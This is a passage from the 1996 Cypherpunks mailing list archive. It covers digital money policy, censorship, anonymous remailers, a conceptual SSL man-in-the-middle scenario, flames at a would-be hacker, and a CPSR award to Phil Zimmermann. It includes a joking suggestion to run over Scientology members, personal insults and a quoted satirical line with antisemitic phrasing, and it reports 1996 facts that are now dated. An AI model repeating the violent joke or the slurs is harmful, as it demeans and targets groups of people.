at juno.com. > > > > Are you the same jerk who was posting a week ago? > > > sure sounds like it. is it possible that there could be two such as this? > > -paul Very possible. Try reading the alt.2600 newsgroup for about a week and see how many me-too, teach-me-how2hack, and other lame messages are posted there on a daily basis. God help us now that they've discovered mailing lists. "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!" (Translation: Hey, wow, dudes, this cyberpunk list is way cool! for those of you who are asciially impaired :) --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From rah at shipwright.com Mon Sep 9 19:06:28 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 10 Sep 1996 10:06:28 +0800 Subject: Hettinga Plays Horseman, Gets the Last Word... Message-ID: It seems the former Office of Technology Assessment, now called the Institute for Technology Assessment (Go, Newt!), had a need for a horseman on their law-enforcement panel tomorrow. Anyone know where I can get a riding crop? :-). I'm scheduled, anyway. I'm in Cupertino at the moment (the Mac-Crypto conference was, er, insanely great; more on that later), and I haven't received the plane tickets yet (Bob Hettinga: You Buy, I Fly), though they're supposed to show up today. We'll see when I get home tonight. Oh. Any former Pac-Man addicts remember the name of the ghosts? I think there were four, right? Cheers, Bob Hettinga ----------------- The Institute For Technology Assessment ITA INSTITUTE FOR TECHNOLOGY ASSESSMENT WORKSHOP DIGITAL MONEY AND PUBLIC POLICY SEPTEMBER 10, 1996 US House of Representatives, Cannon Office Building, Room 121 A Workshop on Public Policy and New Technology: "Digital Money" is a rapidly evolving financial/communications technology. It is important that government, industry, and the public fully understand the unique characteristics and potential benefits and costs of this radically new technology, so that benefits may be fully realized and costs avoided through early, judicious attention to public policy issues and concerns. This workshop brings together the stakeholders and interested parties -including the public and their government representatives-to consider the issues that may be posed by this emerging technology. In this workshop, attention will be focused on three questions: What issues need to be resolved now if development of digital money is to proceed with minimal social costs and institutional risks? Where is there general agreement about needed actions, or about reasonable solutions to recognized problems? Where are there true uncertainties that must be monitored, solved empirically, or objectively researched? The workshop will consist of three sessions. Each will begin with invited presentations, followed by open discussion among presenters and participants. Moderator: Dr. Wayne Boucher of Strategic Futures International 10 a.m. Greetings and Introductions Keynote Address: The Honorable Michael Castle Chairman, Subcommittee on Domestic and International Monetary Policy House Committee on Banking and Financial Services 10:30 a.m. Session I : Digital Money Systems, Today and Tomorrow - Industry Perspectives Who are the players in developing digital money -and what new players will emerge? What are the potential benefits -and costs-for banks, credit card companies, telecom companies, software vendors, or others? What has been learned from early pilot systems? What are the relative advantages-and risks-of smart cards vs. network-based systems? What older payment systems lose ground to electronic money and smart cards? Is the playing field level with respect to regulation and legislation? Specific issues that may be raised include questions about state licensing, Bank Secrecy Act coverage and financial privacy, protocols for payments of different sizes, clearinghouses, and multiple mints. PRESENTERS: Roger Applewhite, Benton International, Inc., Torrance, California William Barr, Bellcore, Basking Ridge, N.J. Electronic Funds Transfer Association, Reston, Virginia Kawika Daguio, American Bankers Association, Washington, D.C. 12:30 p.m. Buffet lunch 1:15 p.m. Session II. Government's Role in the Development of Digital Money How may existing laws and regulations impede the development of digital money? Does the possibility of future regulations or restrictions threaten to drive development in sub-optimal directions? Do banks or other potential developers need firmer assurances about regulatory intentions? Does existing legislation and regulation adequately protect property and contract rights with regard to digital money? What might be the effect of European data protection initiatives, and what steps can the US government take to circumvent international friction over this issue? What are the major risks imposed by digital money, including risks of devaluation of US currency? Could private insurance buttress against network failure, electronic runs on money, or other sources of catastrophic risk? To what extent could a failure in digital money systems contaminate or threaten the traditional banking system, or the integrity of traditional money systems? Who will set standards with respect to risk management and capital adequacy of clearing systems? Should smart cards and small internet transactions be exempt from Regulation E and EFTA protections against consumer liability? Would -or should Representative Markey's On-line Privacy Bill cover digital money transactions? Would non-bank digital money mints be covered by the Right to Financial Privacy Act of 1978 and the Electronic Communications Act of 1986? Which party would bear the risk of loss in case of hard-disk crashes, counterfeiting, network failure, etc.? PRESENTERS: Melanie Fein, Arnold & Porter, Washington, D.C. L. Richard Fisher, Morrison & Foerster, Washington, D.C. Professor Sarah Jane Hughes, Indiana University Law School 2:45 p.m. Session III: Law Enforcement Issues Will anonymous instantaneous digital money create the possibility of new crimes, or new versions of old crimes -theft, money laundering, insider trading, etc.? How would the flow of invisible, non-traceable money affect law enforcement and the administration of justice? Do benefits of encryption outweigh the possible harm to law enforcement capabilities? Does digital money threaten the new focus of law enforcement on seizing the proceeds of criminal enterprises? Considering the lessor of the Digital Telephony Act, can early cooperation between digital money providers and law enforcement avoid the heavy costs of retrofitting systems to accommodate the needs of law enforcement? What is the appropriate role of government in assuring the security of digital money systems against breaches by insiders, or criminals, or terrorists? To what extent would digital money threaten the ability of the IRS to collect taxes or to prosecute tax dodgers? PRESENTERS: Roger Weiner, Deputy Director, FinCEN, U.S. Department of the Treasury Scott Charney, Chief, Computer Crimes Section, U.S. Department of Justice Robert Hettinga, Boston, MA 4:00 p.m. Adjournment Conference Organizers Steven Bonorris, Vary Coates (ITA) 202 686 0693 ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From tcmay at got.net Mon Sep 9 19:17:10 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:17:10 +0800 Subject: SPL -- Suspicious Persons List Message-ID: Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming in this morning. I'm sure you're busy, so I'll make this as short as possible. OK with you?" Joseph Shlubsky, Programmer: "Uh, sure." Digitaltronics: "Joe, we have a problem. We understand that on your last two business trips you've been flagged for Special Processing at airport security. We checked, and it seems you're on the Suspicious Persons List. As you know, this causes problems for your fellow travellers (no pun intended, eh Joe ). And, Joe, it undermines the corporate image for one of our people to be on the SPL. I'm sure you see our problem?" JS: "Uh...." Digitaltronics: "Joe, we're not sure what you've been doing to get yourself put on the SPl, and we're forbidden by the Fairness in Employment Act from even asking you about your interests and affiliations, but we really can't have representatives of Digitaltronics being pulled aside for SPL processing, now can we?" JS: "But I told them I was only carrying a briefcase, and that they could search it all they wanted to, and--" Digitaltronics: "Joe, I'm sorry, but we're going to have to let you go. You know how these things are. Nothing can be done. Not our decision, when you think about it. The government has their ideas of who should be on the Suspicious Persons List, and there's just nothing we can do about it. We just can't have our corporate image linked to persons on the SPL. Now, Joe, you'll get a generous 6 weeks of severance pay, and Daphne will assist you with your outplacement processing. Of course, Joe, you will have to go through an inspection every morning until you're fully processed...there's that SPL matter, you know." JS: "Uh..." From tcmay at got.net Mon Sep 9 19:26:09 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:26:09 +0800 Subject: ... subversive leftists Message-ID: At 4:57 PM 9/9/96, William H. Geiger III wrote: >In , on 09/09/96 at >12:53 PM, > Stephan Schmidt said: > > >>I hope this one was ironic. > >>> The Democratic People's German Reich is fully justified in cutting off >>> contacts with subversive radical publications in Jew-dominated nations like >>> Holland. >>> >>> As Reichskommander Schmidt points out: "The citizen-units who access >> ^^^^^^^^^^^^^^^^^^^^^^^ >>But this one is tasteless and insulting even if it was >>meant ironic. > >If the boot fits....... > I don't know why Stephan waited so many days to make his comment. It was my noticing that I had "collided" with his name, Schmidt, when I made my facetious post that caused me to almost immediately issue a clarification that I was not thinking of him when I made my first post. To be clear, again, I was not basing my "Reichskommander Schmidt" line on Stephan Schmidt. That was just a coincidence. As to the "Reichskommander," in our country, and on the Net, such jokes are not illegal. I rather suspect they are in Germany, either the DDR or the Western side. As to "tasteless and insulting," a matter of personal perspective. I find it helpful to call a spade a spade, and others apparently do as well. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 9 19:32:15 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:32:15 +0800 Subject: U.S. as a Terrorist State Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >And I support a terrorist organization (the US Government) every year >whether I want to or not. The US was convicted of a major violation of >international law (akin to terrorism) in the International Court of Justice >back in the '80s for air sowing mines in Nicaragua's main harbor. This is a lie, a lie by the subversive left. As is well-known, the recent unpleasantness surrounding the Sandanista State was a police action in which Air America was protecting its agricultural subsidies to certain freedom-loving, non-leftist nations. Principally Bolivia, Columbia, and Peru. As noted foodstuff vendor, the Culinary Institute of America, was the prime importer of these agricultural products, the CIA was of course involved in this police action to protect the flow of their goods. The mining of a harbor of a state with which we are not at war, and which has a government elected by a democratic process, is justified if the Commander in Chief believes it is. When the U.S. funds freedom fighters in Iran and Iraq, this is different of course from when Libya funds terrorists. (It is different because our Commander in Chief tells us it is.) That the World Court would find the United States guilty of terrorist actions (and cases are pending involving the U.S.-funded bombing of Cuban planes, the use of bomblets in toys dropped in other police action cases, and the funding of the Brigate Rose by Gehlen operatives...) shows the World Court is becoming dangerously independent. I suggest the U.S. cut off funding until it learns to heel. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From weidai at eskimo.com Mon Sep 9 19:37:18 1996 From: weidai at eskimo.com (Wei Dai) Date: Tue, 10 Sep 1996 10:37:18 +0800 Subject: papers on anonymous protocols Message-ID: I found a couple of papers on anonymous protocols that I haven't seen mentioned here before. I'll list them for people who might be interested: Cryptographic Defense Against Traffic Analysis by Rackoff and Simon. http://pct.microsoft.com/papers/ta.ps gives a proof of security for a mix-net like protocol. A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable Communication with Very Small Bandwidth Overhead; Proc. Kommunikation in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte 267, Springer-Verlag, Heidelberg 1991, 451-463. describes a protocol for anonymous telephone calls. Wei Dai From jya at pipeline.com Mon Sep 9 19:39:10 1996 From: jya at pipeline.com (John Young) Date: Tue, 10 Sep 1996 10:39:10 +0800 Subject: Crypto Num Mum, Hmm Message-ID: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com> The Washington Post, September 9, 1996, p. A2. Computers: Number Crunchers' 1 and Only It's big. It's beautiful. And it's prime. Computer scientists at Cray Research have discovered the largest known prime number. A prime number, for those of us who have forgotten grade school mathematics, can only be divided by itself and by 1. Smaller primes include 2, 3, 5, 7 and 11. The new one, 2^1257787-1, is a bit bigger. Printed out, the 378,632 digit number would take up 12 newspaper pages. "We're pretty confident that this is the largest known prime number," said researcher Paul Gage. There are an infinite number of primes but they are extremely difficult to find. The newly discovered prime number is of a type known a "Mersenne" prime, named for a 17th century French monk and mathematician. It is easier to prove the prime-ness of Mersenne numbers than other primes, thanks to complex mathematical software. Cray runs the prime-testing program to search for bugs in its new supercomputers. Gage said the discovery of the prime was a happy byproduct of the process. The new number was discovered during a six-hour run testing a new Cray T94 system. Prime numbers are useful in the field of cryptography, where they are used to help construct virtually unbreakable codes. The new prime is far larger than those commonly used. Said Gage, "A cryptographer interested in numbers this big wouldn't be talking about it." -- John Schwartz [End] From tcmay at got.net Mon Sep 9 19:40:37 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:40:37 +0800 Subject: China joins Singapore, Germany, .... Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >Course there hasn't really been much net censorship. Germany and China's >attempts have not been effective. The Feds lack a mechanism for "blocking >sites." There is no one in a position to give such an order. There is no >chance that such an order would be obeyed in any widespread way in any case. >Outlaw boards crackdowns didn't diminish the number of outlaw boards. Porno >boards crackdowns did not diminish the number of porno boards. Since it is >easier to create a site than it is to set up a board, legal maneuvers by the >Feds won't work. > >Making sites "illegal to connect to" is meaningless because most users won't >even know what is on the list and most of those who do will be encouraged to >connect to them rather than discouraged. While I agree with Duncan's sentiments (obviously) and even agree that censorship is impossible to completely implement, I think Duncan is oversimplifying and thus trivializing the dangers to Chinese, German, Singaporan, etc., subjects. Prison sentences in Germany for those who reveal forbidden information about "the Holocaust," prison terms (or worse) for dissidents in Burma, China, and, of course, various other nations and "democratic people's republics." Even here in the United States, connecting to an illegal site may mean imprisonment. (The charge: trafficking in child pornography, for example.) Rather than saying such laws are "meaningless," developing blinded, steganographic, etc. proxies may be a more useful strategy. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From demo at offshore.com.ai Mon Sep 9 19:41:40 1996 From: demo at offshore.com.ai (Vince) Date: Tue, 10 Sep 1996 10:41:40 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: <199609091638.MAA19400@mail2.panix.com> Message-ID: On Mon, 9 Sep 1996 tbyfield at panix.com wrote: > vince at offshore.com.ai (Vincent Cate): > > If the Navy was firing missiles in this area, it really does seem like the > > press should be checking out this angle. > > What makes you think they aren't? Not saying they aren't; however, I don't recall seeing CNN or any of the networks saying if the Navy really was firing missiles or not. Have they? Never seen anyone ask questions about US firing missiles (have seen them ask if it was a missile or a bomb). I don't get any US newspapers here in Anguilla, so my impression of the US press is really just from TV. Is the press on top of this? -- Vince From jbugden at smtplink.alis.ca Mon Sep 9 19:44:37 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 10 Sep 1996 10:44:37 +0800 Subject: What is the EFF doing exactly? Message-ID: <9608098423.AA842308610@smtplink.alis.ca> This may be a hopelessly naive question, but is it possible to refuse payment in cash? Is it really good for all debts public and private? James ---------- From: kamml at secret.org Sent: Monday, September 09, 1996 3:23 PM To: cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Fedex will not accept cash in New York City. I have tried to pay cash and been refused. I have talked to customer service and confirmed that they will not accept cash in NYC although they will elsewhere. From ses at tipper.oit.unc.edu Mon Sep 9 19:46:09 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 10 Sep 1996 10:46:09 +0800 Subject: Crypto Num Mum, Hmm In-Reply-To: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com> Message-ID: It's kind of tempting to generate the key and certificate using this as q and the previous largest as p, if only for machismo at keysignings :-) --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From weidai at eskimo.com Mon Sep 9 19:51:19 1996 From: weidai at eskimo.com (Wei Dai) Date: Tue, 10 Sep 1996 10:51:19 +0800 Subject: strengthening remailer protocols In-Reply-To: Message-ID: On Sun, 8 Sep 1996, Lance Cottrell wrote: > Mixmaster prevents replay, so flooding multiple copies of a single message > will not work. This is the reason Mixmaster has no reply block feature. I > can see two ways in which replies can work safely. How about a combination of the two? Suppose Alice wants to anonymously post a message and get replies. She generates a new RSA key, signs her post with it, and asks readers to send encrypted replies to a server. Then periodicly she sends a one-time reply block to the server to retrieve the accumulated replies. This would let Alice receive an unbounded number of replies and also give some protection against the denial-of-service and rubber-hose attacks Lance described. Wei Dai From frissell at panix.com Mon Sep 9 19:51:23 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 10:51:23 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960909182906.008a8378@panix.com> At 01:03 AM 9/9/96 -0700, Timothy C. May wrote: > >CNN is presenting coverage of China's decision to pull the plug on more >than 100 sites, and issuing a list of sites which are illegal to connect >to. > >(Net censorship is getting to be a big story....when the list of countries >reaches 15, it will of course no longer be news. And when the United States >block access, this will all be transmogrified into an "Anti-Terrorist >Action.") Course there hasn't really been much net censorship. Germany and China's attempts have not been effective. The Feds lack a mechanism for "blocking sites." There is no one in a position to give such an order. There is no chance that such an order would be obeyed in any widespread way in any case. Outlaw boards crackdowns didn't diminish the number of outlaw boards. Porno boards crackdowns did not diminish the number of porno boards. Since it is easier to create a site than it is to set up a board, legal maneuvers by the Feds won't work. Making sites "illegal to connect to" is meaningless because most users won't even know what is on the list and most of those who do will be encouraged to connect to them rather than discouraged. Meanwhile the most dangerous sites are not ones on any banned list but the simple sites individuals put up for their hobbies and businesses which get them used to the networked world and get them used to independent thought and action. To being actors rather than passive consumers. Questioning, building, developing a sense of their own powers. Soaking up the libertarian culture of the nets through their skins without even noticing it. More dangerous than fulminate of mercury. DCF "If people do lots of things they get used to doing lots of things. If people make lots of choices they get used to making lots of choices. If people get used to doing and choosing pretty soon they get used to being free without even noticing it." From nobody at replay.com Mon Sep 9 20:03:36 1996 From: nobody at replay.com (Anonymous) Date: Tue, 10 Sep 1996 11:03:36 +0800 Subject: U.S. Presidential Odds Are In Message-ID: <199609092200.AAA10566@basement.replay.com> Hello, I am the anonymous oddsman, here with the U.S. presidential odds, kindly provided to me by a person who wishes to remain anonymous. Some of you know who I am, and I would prefer that my true identity remain a mystery, as what I am doing may well be slightly illegal AFAIK. Thank you. Ladbroke's customer service person [number +44 181 8621820 (that's a London area code)] looked up the info. He had to call someone else to get Perot's odds. Next time (if they even have them) Harry Browne odds. Here's what Ladbroke's said today: 1:7 Clinton 4:1 Dole 50:1 Ross Perot That's all for today, this information will be posted aproximately weekly, but more often as the election approaches or major events happen, and certianly more often if my posting it appears to be somehow annoying U.S. authorities. ;) the anonymous oddsman From ses at tipper.oit.unc.edu Mon Sep 9 20:05:02 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 10 Sep 1996 11:05:02 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: <199609091614.MAA24724@jekyll.piermont.com> Message-ID: Remember, though - TCPs initial estimate of the congestion window is never less than one packet, large numbers of opening connections can still (I think) lead to congestion collapse. It can defnitely get close to it. At one point, when sunsite was getting a few 100k hits a day with only one T1 there were times when around 2/3rds of all packets were re-transmitted. Jon Crowcroft observed similar problems at some UK links, though see Van's article on either ietf or end2end a month or so back with the counter argument. Simon On Mon, 9 Sep 1996, Perry E. Metzger wrote: > > Martin Minow writes: > > For several months (years?) Bob Metcalf has been predicting that > > the Internet will self-destruct from overload. His argument > > appears to follow one of Gordon Bell's maxims: "anyone can predict > > the future: all you need is semi-log paper and a ruler." As I > > understand it, Metcalf's argument is that network load (messages, > > packets) is growing exponentially, while network bandwidth (fiber > > capacity, switch performance) is growing linearly. At some point, > > these two curves cross -- and demand will exceed capacity. > > Except for the following. > > 1) TCP backs off. > 2) Capacity is growing exponentially. > > Perry > > --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From snow at smoke.suba.com Mon Sep 9 20:05:52 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 11:05:52 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Stephan Schmidt writes: > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > http://www.terrorist.org ? smoke:~> whois terrorist.org [rs.internic.net] Terrorist Organization (TERRORIST2-DOM) 1525 SW 14th #4 Portland, OR 97201 US Domain Name: TERRORIST.ORG Administrative Contact, Technical Contact, Zone Contact, Billing Contact: Sievert, Jerry (JS651) jerrys at E-Z.NET 360-260-1122 Record last updated on 26-Jun-96. Record created on 26-Jun-96. Domain servers in listed order: E-ZONE.E-Z.NET 205.240.28.1 NS1.IXA.NET 199.242.16.1 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Petro, Christopher C. petro at suba.com snow at smoke.suba.com From roy at sendai.scytale.com Mon Sep 9 20:19:36 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Tue, 10 Sep 1996 11:19:36 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <199609091748.NAA27475@attrh1.attrh.att.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In your mail, you write: > At 01:03 PM 9/7/96 CST, roy at scytale.com wrote: > >Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard > >from my wallet, can they reconstruct what calls I made with it? > > Easily. They get the card number off the card, and then check their > long distance records for calls made with that card number. I thought as much. Does the audit trail extend to local calls too? (I suspect it does) - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjSZvxvikii9febJAQHdLQP8DA/xxhnKNZOUex5dp/P4kRgLbgS9HryO tuR5G4eCnjJsuANxuzuUFrjoRm8jknIOhdnrubcK1fxPwInJdMqWbJ8WDPyJcoCf 5jq4ePpahMa2VUbZRoFOwN86n25l0DHHK8lsWpDQ8y8pg/zqToEyLiUJTUi+RID6 HC5eltYmMJc= =uj3L -----END PGP SIGNATURE----- From nexus at adv.es Mon Sep 9 20:28:32 1996 From: nexus at adv.es (I~nigo Gonzalez) Date: Tue, 10 Sep 1996 11:28:32 +0800 Subject: Can you trust your ISP ?? Message-ID: <3234A158.3492@adv.es> Hello, I'm thinking about how can I get rid off this kind of attack *before* it happens. Can you please send me your comments about this? I don't know so much about the how SSL works, but I think this is something that can happen... SCENARIO -------- 1) Suppose We have a host with https protocol enabled, and someone outside wish to access the information we have on the server via https; but (for some reason wich we don't know), the connection has to be made through the Gateway named X (see plain diagram below): Outside <-------------> Gateway X <---------------> Our Server 2) I think that when a Secure Socket Layer connection begin this is what it happens: a) Outside generates a private/public key pair and he send us his public key, wich has to go through Gateway X, who send it to Our Server. b) Our Server generates his own private/public key pair and send his public key (whether it's sent ciphered or not doesn't matter... yet). c) Now both parts have their response public keys, ciphered transaction begins. All seems to be fine, but... 3) Suppose that We don't trust on what's going on through the line, and that IN FACT, someone in Gateway X is disturbing our communications like this: a) When Outside's public key comes to the gateway, Gateway X generates a public/private key pair (wich we will call spoofed keys), and it send a spoofed IP header marked as from "Outside" in order to act as "Outside" for "Our Server". b) Once "Our server" send his public key, "Gateway X" intercept the packet, decrypts it if necessary (because it has the private key needed to decrypt it), and it send "Outside" the public spoofed key (remember what it did on stpe a?). c) Now transaction takes place through "Gateway X", wich can read modify, and fake any data because it has now the ability to act as the other side to both "Outside" and "Our Server"... Avoid the problem: - The *only* think I can figure out to avoid the menace is to have a certified (Verisign and others) public key with a short expiration date. Of course this approach has a little problem: *how* can I verify that once expired "Our Server's" public key is really "Our Server's" key... a Certification Authority is something worth of spoofing... ;-) Maybe the best thing could be becoming my own certification authority... but how!? If for *some* reason the above cannot be done, the a simple way to avoid too much trouble is to limit transactions to just *atomic* transactions (checking account and getting some money are two different transactions). This can still be spoofed if "Gateway X" makes its own transaction with faked Outside's keys. Of course, We must limit the tansactions we accept in "Our Server". Notice that a password and challenges are useless in this kind of situations. �Any other way? maybe we can get somethig a bit safer if we found something fixed, inmutable and rely on it (acting like some kind of virtual communication channel between Outside and Our Server: Untrusted Outside <-------------> Gateway X <---------------> Our Server ^ ^ | | \-------- Virtual secure communication channel -------/ If every message "Outside" send to "Our Server" must have a response, then we could make "Our Server" send responses with some good (well tought) cryptographic technique wich will refer somehow to "Outside's" message fingerprint. I mean, every message from the Outside must have a message signature (i.e message must pass through MD5); and its response must have a valid "Response to: " and (of course) that response must be signed somehow. I still don't know how to do it well; but I will tell you how as soon as I will know. Thank you for wasting your time reading this. -- I�igo Gonz�lez - ADV Internet Technical Advisor "Never say anything online that you wouldn't want to see on the front page of The New York Times." - alt.2600.moderated Posting From pjn at nworks.com Mon Sep 9 20:31:51 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:31:51 +0800 Subject: talker [is illiterate Message-ID: In> = You know man I am a profesional so don't reply to me In> = as a novice or anything. I have been doing this since I In> = wuz 12. And I'm not young for my age I know alot In> = about hacking and FYI there's alot you could learn from In> = me so don't think 23 is a young age pal. In> = In> = Doom13 In> = Listen you little juno-using twit... I have been hacking (Yes, the Electronic B&E type of hacking) sinse before you were a twinkle in the mailmans eye... YOU want to learn something? Sit on your ass, and read... Dont waste mailbot space with the crap you write... P.J. pjn at nworks.com ... Eliminate spare time - buy a modem! ___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:37:05 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:37:05 +0800 Subject: talker Message-ID: The shitless fake hacker doom13 tried to say: > I am doom13. If there is anyone out there who is a hacker or >would like to be one you can talk to me and find out stuff like cracking. >Just drop a message at doom13 at juno.com. In> Hmmmm... Want to bet our other friend at juno.com sent him? I might In> just end up killfiling juno.com... Obviously a low-IQ area of the net. Its not low IQ... Its non-existant... It is a free E-Mail group, you dont pay, but you have to look at ads... P.J. pjn at nworks.com ... I would rather be judged by twelve then carried by six. ___ Blue Wave/QWK v2.20 [NR] From pjn at nworks.com Mon Sep 9 20:37:13 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Tue, 10 Sep 1996 11:37:13 +0800 Subject: Church of Scientology Message-ID: In> Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a In> favor to Morris Dees and various scumbag associates. For this, CoS got In> their long-awaited (40-plus years!) federal tax-free status. I think, after their part in the closing of anon.penet.fi, some people should RUN over some CoS members... :) P.J. pjn at nworks.com ... "Bother," said Pooh, as he was assimilated by the Borg. ___ Blue Wave/QWK v2.20 [NR] From zachb at netcom.com Mon Sep 9 20:41:45 1996 From: zachb at netcom.com (Z.B.) Date: Tue, 10 Sep 1996 11:41:45 +0800 Subject: Followup to 9/1 Observer article printed Message-ID: Found this on alt.privacy today: Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 --- From: naughty at scallywag.com (Naughty Boy) Newsgroups: alt.privacy Subject: READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL! Date: Sun, 08 Sep 1996 20:36:47 GMT Organization: Scallywags of the World Lines: 20 Message-ID: <32332e5c.4219376 at news.u-net.com> NNTP-Posting-Host: host3.animal.u-net.com X-Newsreader: Forte Agent .99e/32.227 READ TODAY'S OBSERVER ARTICLE - THEY SINK TO THEIR TRUE LEVEL! Today, September 8, the Observer publish a follow-up-follow-up article for their amazing "child porn" expose which so grossly libelled Clive Feather and Johan Helsingius ... a review of the "first" toddler CD-ROM... How have the mighty crusaders fallen ! Sic transit gloria mundi.... Actually, the Observer new technology reporters may have found their true niche at last - it's a bit egotistic for the reporter to print such a large picture of himself, though ! Read it all at http://www.scallywag.com PS: Private Eye published an intelligent and amusing commentary on this whole sorry business recently, and scallywag.com will post it, but, in deference to PE, not until the current issue goes off sale. NAUGHTY BOY (The Scallywag) From sevoy at sunnyside.com Mon Sep 9 20:42:09 1996 From: sevoy at sunnyside.com (Susan Evoy) Date: Tue, 10 Sep 1996 11:42:09 +0800 Subject: Zimmermann gets CPSR's Wiener Award Message-ID: <199609091905.MAA18397@snyside.sunnyside.com> * * NEWS ADVISORY * * FOR IMMEDIATE RELEASE August 22, 1996 --------------------- Contact: Computer Professionals for Social Responsibility Duane Fickeisen, Interim Director Phone: 415-322-3778 E-mail: dfickeisen at cpsr.org Phil Zimmermann, controversial inventor of Pretty Good Privacy (PGP), earned the prestigious Norbert Wiener Award of 1996. The Wiener award is for excellence in promoting the responsible use of technology and is given annually by Computer Professionals for Social Responsibility (CPSR). The award will be presented by CPSR board member Nathaniel Borenstein at CPSR's annual meeting on October 19-20, 1996 at Georgetown University in Washington, DC. The award to Zimmermann is related to the theme of the conference, "Communications Unleashed: What's At Stake? Who Benefits? How to Get Involved!," which focuses on the public interest in stewardship of the dazzling array of emerging communications services and issues related to free speech, copyright protection, and privacy online. CPSR is a public-interest alliance of computer scientists and others interested in the impact of computer technology on society. CPSR attempts to direct public attention to difficult choices concerning the applications of computing and how those choices affect society. According to CPSR Interim Director Duane Fickeisen, PGP brings critical privacy issues to public attention, because PGP allows the average person to encode his or her email so only the receiver can read and understand it. Until PGP came along, only governments or large corporations could make their email secure. In computer jargon, PGP is a "public-key encryption software." Zimmermann, 42, created PGP and published it in the U.S.A. as "freeware" (free software) in June of 1991. Since its creation, PGP has spread all over the world, and has since become the de facto worldwide standard for encryption of email. Controversy came with government attempts to control encryption. For three years Zimmermann was the target of a criminal investigation by the US Customs Service, who assumed that laws were broken when PGP spread outside the US. That investigation was closed without indictment in January 1996. Zimmermann wrote PGP from information in the open literature, putting it into a convenient package that everyone can use in a desktop or palmtop computer. "I gave it away for free, for the good of democracy. This technology belongs to everybody," he says. According to Zimmermann, the recent strides in electronic digital communication brought with them a "disturbing erosion of our privacy. In the past, if the government wanted to violate the privacy of ordinary citizens, it had to expend a certain amount of effort to intercept and steam open and read paper mail, and listen to and possibly transcribe spoken telephone conversation. This is analogous to catching fish with a hook and a line, one fish at a time. Fortunately for freedom and democracy, this kind of labor-intensive monitoring is not practical on a large scale." Today, human rights organizations such as Amnesty International are using PGP 